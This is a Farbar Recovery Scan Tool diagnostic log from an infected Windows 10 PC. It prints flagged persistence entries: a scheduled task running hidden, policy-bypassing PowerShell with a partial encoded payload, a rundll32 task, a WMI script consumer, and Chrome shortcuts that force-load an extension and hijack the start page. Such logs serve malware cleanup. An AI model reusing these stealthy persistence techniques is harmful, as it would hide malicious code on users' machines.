Additional scan result of Farbar Recovery Scan Tool (x64) Version: 18-07-2017
Ran by 89vision (19-07-2017 19:57:50)
Running from C:\Users\89vision\Desktop
Windows 10 Home Version 1703 (X64) (2017-06-25 13:08:01)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

89vision (S-1-5-21-2078289314-747550931-3204368465-1001 - Administrator - Enabled) => C:\Users\89vision
Administrator (S-1-5-21-2078289314-747550931-3204368465-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2078289314-747550931-3204368465-503 - Limited - Disabled)
Guest (S-1-5-21-2078289314-747550931-3204368465-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat DC (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-0C0F074E4100}) (Version: 17.009.20058 - Adobe Systems Incorporated)
Adobe After Effects CC 2017 (HKLM-x32\...\AEFT_14_2_1) (Version: 14.2.1 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 4.1.1.202 - Adobe Systems Incorporated)
Adobe Character Animator CC (Beta) (HKLM-x32\...\ANMLBETA_1_0_6) (Version: 1.0.6 - Adobe Systems Incorporated)
Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.10.1 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2017 (HKLM-x32\...\AME_11_1_2) (Version: 11.1.2 - Adobe Systems Incorporated)
Adobe Photoshop CC 2017 (HKLM-x32\...\PHSP_18_1_1) (Version: 18.1.1 - Adobe Systems Incorporated)
Adobe Premiere Pro CC 2017 (HKLM-x32\...\PPRO_11_1_2) (Version: 11.1.2 - Adobe Systems Incorporated)
Aktualizace NVIDIA 25.0.0.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 25.0.0.0 - NVIDIA Corporation) Hidden
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 382.53 - NVIDIA Corporation) Hidden
Apple Mobile Device Support (HKLM\...\{5D61F006-168C-4B8B-B7FD-F113C10AE0E4}) (Version: 8.2.1.3 - Apple Inc.)
Avira Connect (HKLM-x32\...\{661C79C2-D156-419C-81CA-D1A2523B0841}) (Version: 1.2.91.10326 - Avira Operations GmbH & Co. KG) Hidden
Avira Connect (HKLM-x32\...\{dd9049b8-31d1-40bd-8c8c-97a7b087a78f}) (Version: 1.2.91.10326 - Avira Operations GmbH & Co. KG)
Battlefield™ 1 (HKLM-x32\...\{335B50BC-6130-4BAF-9A6A-F1561270587B}) (Version: 1.0.50.17863 - Electronic Arts)
Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 1.0.1 - Bitdefender)
CCleaner (HKLM\...\CCleaner) (Version: 5.32 - Piriform)
FilmConvert Pro 2.36 AE (HKLM\...\FilmConvert Pro 2.36 AE_is1) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 59.0.3071.115 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Intel(R) C++ Redistributables on Intel(R) 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.6.1194 - Intel Corporation)
Intel(R) Network Connections 20.1.2019.0 (HKLM\...\PROSetDX) (Version: 20.1.2019.0 - Intel)
Intel® Security Assist (HKLM-x32\...\{B294CE94-FE0F-4427-910C-180AF9FCFED1}) (Version: 1.0.1.620 - Intel Corporation)
Java 8 Update 131 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180131F0}) (Version: 8.0.1310.11 - Oracle Corporation)
Java 8 Update 131 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180131F0}) (Version: 8.0.1310.11 - Oracle Corporation)
Magic Bullet Suite v12.0.6 (HKLM-x32\...\{99487911-8011-42BC-B594-8B02BFD32B1D}_is1) (Version: 12.0.6 - Red Giant, LLC)
Microsoft OneDrive (HKU\S-1-5-21-2078289314-747550931-3204368465-1001\...\OneDriveSetup.exe) (Version: 17.3.6917.0607 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM-x32\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation)
NVIDIA GeForce Experience 3.6.0.74 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.6.0.74 - NVIDIA Corporation)
NVIDIA Ovladač 3D Vision 382.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 382.53 - NVIDIA Corporation)
NVIDIA Ovladač HD audia 1.3.34.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.27 - NVIDIA Corporation)
NVIDIA Ovladač řídící jednotky 3D Vision 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA Ovladače grafiky 382.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 382.53 - NVIDIA Corporation)
NVIDIA Systémový software PhysX 9.17.0329 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0329 - NVIDIA Corporation)
NvNodejs (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvNodejs) (Version: 3.6.0.74 - NVIDIA Corporation) Hidden
NvTelemetry (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvTelemetry) (Version: 2.4.10.0 - NVIDIA Corporation) Hidden
NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
Origin (HKLM-x32\...\Origin) (Version: 10.4.14.21968 - Electronic Arts, Inc.)
Ovládací panel NVIDIA 382.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 382.53 - NVIDIA Corporation) Hidden
PLAYERUNKNOWN'S BATTLEGROUNDS (HKLM\...\Steam App 578080) (Version:  - Bluehole, Inc.)
Podpora aplikací Apple (32bitová) (HKLM-x32\...\{7FE25256-B7C1-480D-B736-10A67A833AEA}) (Version: 3.2 - Apple Inc.)
Podpora aplikací Apple (64bitová) (HKLM\...\{B255D495-4734-4E9B-B4F5-96702FD4A7B9}) (Version: 3.2 - Apple Inc.)
RE:Vision Effects Twixtor AE (HKLM\...\Twixtor AE 6.1.0_is1) (Version: 6.1.0 - Team V.R)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7848 - Realtek Semiconductor Corp.)
Red Giant Link (HKLM-x32\...\{10F82E5B-B611-4C65-8F29-666A9EC5680A}_is1) (Version: 1.9.6.0 - Red Giant, LLC)
SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 7.1.0370 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 3.6.0.74 - NVIDIA Corporation) Hidden
Sony a6300 Camera Pack (HKLM-x32\...\{F7DC882C-6343-4BF3-9396-3897FB11DF48}) (Version: 1 - Rubber Monkey Software)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1244 - SUPERAntiSpyware.com)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.6 - VideoLAN)
Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2078289314-747550931-3204368465-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-D6A3FDDD3DFC}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
CustomCLSID: HKU\S-1-5-21-2078289314-747550931-3204368465-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2017-05-26] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2017-05-26] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2017-05-26] ()
ContextMenuHandlers01: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2017-05-26] ()
ContextMenuHandlers01: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => G:\Adobe_cloud\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2015-03-17] (Adobe Systems Inc.)
ContextMenuHandlers01: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers01: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} =>  -> No File
ContextMenuHandlers05: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2017-06-08] (NVIDIA Corporation)
ContextMenuHandlers06: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2017-05-26] ()
ContextMenuHandlers06: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => G:\Adobe_cloud\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2015-03-17] (Adobe Systems Inc.)
ContextMenuHandlers06: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers06: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} =>  -> No File

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {1BAFD9BE-173E-4064-A81F-3D17933CDF8F} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-06-08] (NVIDIA Corporation)
Task: {1E53DE8E-033A-4717-AC20-7509F74F6A7A} - System32\Tasks\AdobeAAMUpdater-1.0-DESKTOP-DEFCV82-89vision => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
Task: {23D18131-8927-499C-84F6-1CC247DFE58E} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-06-08] (NVIDIA Corporation)
Task: {408786D9-24F8-4C49-A110-69666D2FDD8C} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-06-08] (NVIDIA Corporation)
Task: {469AF34B-01E2-4DC7-B6DF-4A9498897BE9} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-06-25] (Google Inc.)
Task: {4C078942-472E-418C-9B77-6C9F09532EFB} - System32\Tasks\{0F0D7F47-7F0F-797D-7911-0B050F0A1104} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ACAAOwAgADsAOwAgADsAOwA7ACAAIAA7ADsAIAAgADsAIAAgADsAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkA (the data entry has 9984 more characters). <==== ATTENTION
Task: {799DC36B-5C65-4750-9727-2AAD6A4E08B5} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-06-08] (NVIDIA Corporation)
Task: {83A3C78E-77C8-4F09-A106-B7CAEE82CCEE} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-06-08] (NVIDIA Corporation)
Task: {89527095-3DB4-41DB-894A-E07E0CBA1DBA} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-06-08] (NVIDIA Corporation)
Task: {962EC6C1-5354-4DBB-A81D-6C8193330BBD} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-06-08] (NVIDIA Corporation)
Task: {99D2A694-8A9B-4EE8-BEC7-E51A34188FAD} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2016-11-15] (Bitdefender)
Task: {9F1C5CEE-A7A8-4098-AE16-56C60523E927} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {B8DC86FC-C5BF-476F-BE16-5306A6DDD414} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-06-08] (NVIDIA Corporation)
Task: {C73CE41D-B0BB-44BD-BEE3-25E4CB3B0E4A} - System32\Tasks\PureTimMash => C:\Windows\system32\rundll32.exe "C:\Program Files\PureTimMash\PureTimMash.dll",ENXmZC <==== ATTENTION
Task: {D77C4324-E84F-4ED8-B4DA-055D616D5B59} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-06-25] (Google Inc.)
Task: {E4D0BD64-8ED0-4CA6-A907-36E5FDC7B617} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-02-19] (Intel(R) Corporation)
Task: {E5005239-3795-4ADF-A120-013BF5728351} - System32\Tasks\Red Giant Link => C:\Program Files\Red Giant Link\Red Giant Link.exe
Task: {F813CE15-E7CC-4C0C-AE58-FDA2E5752B59} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-06-30] (Piriform Ltd)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

WMI_ActiveScriptEventConsumer_ASEC: <==== ATTENTION

ShortcutWithArgument: C:\Users\89vision\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --load-extension="C:\Users\89vision\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktopbr.com/
ShortcutWithArgument: C:\Users\89vision\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --load-extension="C:\Users\89vision\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktopbr.com/
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --load-extension="C:\Users\89vision\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktopbr.com/

==================== Loaded Modules (Whitelisted) ==============

2015-05-15 16:26 - 2015-05-15 16:26 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-05-15 16:26 - 2015-05-15 16:26 - 01346344 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2017-06-25 15:38 - 2013-07-03 20:32 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2017-06-25 15:22 - 2017-06-25 15:20 - 01360016 _____ () C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.22\AsSysCtrlService.exe
2017-06-25 15:17 - 2017-06-08 03:45 - 01267136 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-05-26 03:18 - 2017-05-26 03:18 - 00492112 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\Windows\SYSTEM32\inputhost.dll
2017-03-18 22:59 - 2017-03-20 06:45 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-06-27 22:16 - 2017-06-23 05:21 - 03807064 _____ () C:\Program Files (x86)\Google\Chrome\Application\59.0.3071.115\libglesv2.dll
2017-06-27 22:16 - 2017-06-23 05:21 - 00100184 _____ () C:\Program Files (x86)\Google\Chrome\Application\59.0.3071.115\libegl.dll
2017-05-15 02:38 - 2017-05-15 02:38 - 34957896 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
2017-07-06 00:07 - 2017-07-13 17:53 - 00022872 _____ () C:\Program Files (x86)\Origin\QtWebEngineProcess.exe
2017-03-18 22:58 - 2017-03-18 22:58 - 00047616 _____ () C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUITelemetry.dll
2017-07-11 20:15 - 2017-07-07 08:15 - 02331136 _____ () C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUIViewModels.dll
2017-07-11 20:15 - 2017-07-07 08:15 - 02836480 _____ () C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUIDataModel.dll
2017-06-25 15:38 - 2017-07-19 19:49 - 00042280 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll
2017-06-25 15:38 - 2013-07-03 20:32 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll
2017-07-06 00:07 - 2017-07-13 17:53 - 02493440 _____ () C:\Program Files (x86)\Origin\libGLESv2.dll
2017-06-25 15:17 - 2017-06-08 03:45 - 01040320 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-07-06 00:07 - 2017-05-17 03:54 - 00678176 _____ () H:\Steam\SDL2.dll
2017-07-18 19:51 - 2017-07-18 02:33 - 02497824 _____ () H:\Steam\video.dll
2017-07-06 00:06 - 2016-01-27 09:49 - 00332800 _____ () H:\Steam\libavresample-2.dll
2017-07-06 00:06 - 2016-01-27 09:49 - 00442880 _____ () H:\Steam\libavutil-54.dll
2017-07-06 00:06 - 2016-01-27 09:49 - 00485888 _____ () H:\Steam\libswscale-3.dll
2017-07-06 00:07 - 2016-09-01 03:02 - 04969248 _____ () H:\Steam\v8.dll
2017-07-06 00:06 - 2016-01-27 09:49 - 00491008 _____ () H:\Steam\libavformat-56.dll
2017-07-06 00:06 - 2016-01-27 09:49 - 02549760 _____ () H:\Steam\libavcodec-56.dll
2017-07-06 00:07 - 2016-09-01 03:02 - 01195296 _____ () H:\Steam\icuuc.dll
2017-07-06 00:07 - 2016-09-01 03:02 - 01563936 _____ () H:\Steam\icui18n.dll
2017-07-18 19:51 - 2017-07-18 02:33 - 00884512 _____ () H:\Steam\bin\chromehtml.DLL
2017-07-06 00:06 - 2016-07-05 00:17 - 00266560 _____ () H:\Steam\openvr_api.dll
2017-06-25 15:17 - 2017-06-08 03:45 - 65708992 _____ () C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll
2017-07-06 00:07 - 2017-07-13 17:53 - 00012288 _____ () C:\Program Files (x86)\Origin\libEGL.DLL
2017-06-04 07:19 - 2017-06-04 07:19 - 52051552 _____ () C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\CEF\libcef.dll
2015-03-17 01:34 - 2015-03-17 01:34 - 00010240 _____ () G:\Adobe_cloud\Acrobat DC\Acrobat\Locale\cs_CZ\acrotray.cze
2017-05-30 01:39 - 2017-05-30 01:39 - 00118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\fs-ext\build\Release\fs-ext.node
2017-05-30 01:39 - 2017-05-30 01:39 - 00214528 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node
2017-05-30 01:38 - 2017-05-30 01:38 - 00117248 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ref\build\Release\binding.node
2017-05-30 01:39 - 2017-05-30 01:39 - 00125952 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ffi\build\Release\ffi_bindings.node
2017-06-04 07:47 - 2017-06-04 07:47 - 00099424 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll
2017-05-30 01:39 - 2017-05-30 01:39 - 00086528 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\idle-gc\build\Release\idle-gc.node
2017-07-06 00:06 - 2017-05-17 03:54 - 00678176 _____ () H:\Steam\bin\cef\cef.win7\SDL2.dll
2017-07-12 18:27 - 2017-07-06 19:58 - 73088800 _____ () H:\Steam\bin\cef\cef.win7\libcef.dll
2017-07-18 19:51 - 2017-07-18 02:33 - 00384288 _____ () H:\Steam\steam.dll
2017-05-19 23:49 - 2017-05-19 23:49 - 00118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\fs-ext\build\Release\fs-ext.node
2017-05-19 23:49 - 2017-05-19 23:49 - 00117760 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\ref\build\Release\binding.node
2017-05-19 23:49 - 2017-05-19 23:49 - 00125440 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\ffi\build\Release\ffi_bindings.node
2017-05-19 23:50 - 2017-05-19 23:50 - 00214528 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node
2017-06-04 07:43 - 2017-06-04 07:43 - 00099424 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll
2017-05-19 23:49 - 2017-05-19 23:49 - 00098816 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\bufferutil\build\Release\bufferutil.node
2017-05-19 23:50 - 2017-05-19 23:50 - 00086528 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\idle-gc\build\Release\idle-gc.node
2016-05-25 22:52 - 2016-05-25 22:52 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2017-03-18 23:03 - 2017-07-18 19:51 - 00014368 _____ C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 wemsofts.com
127.0.0.1 bongadoom.com
127.0.0.1 wepcmainsystem.com
127.0.0.1 internalcampaigntargets.com
127.0.0.1 bongadoom.com
127.0.0.1 getthefilenow.com
127.0.0.1 bigpicturepop.com
127.0.0.1 wizzcaster.com
127.0.0.1 bestoffersfortoday.com
127.0.0.1 wepcmainsystem.com
127.0.0.1 agent.wizztrakys.com
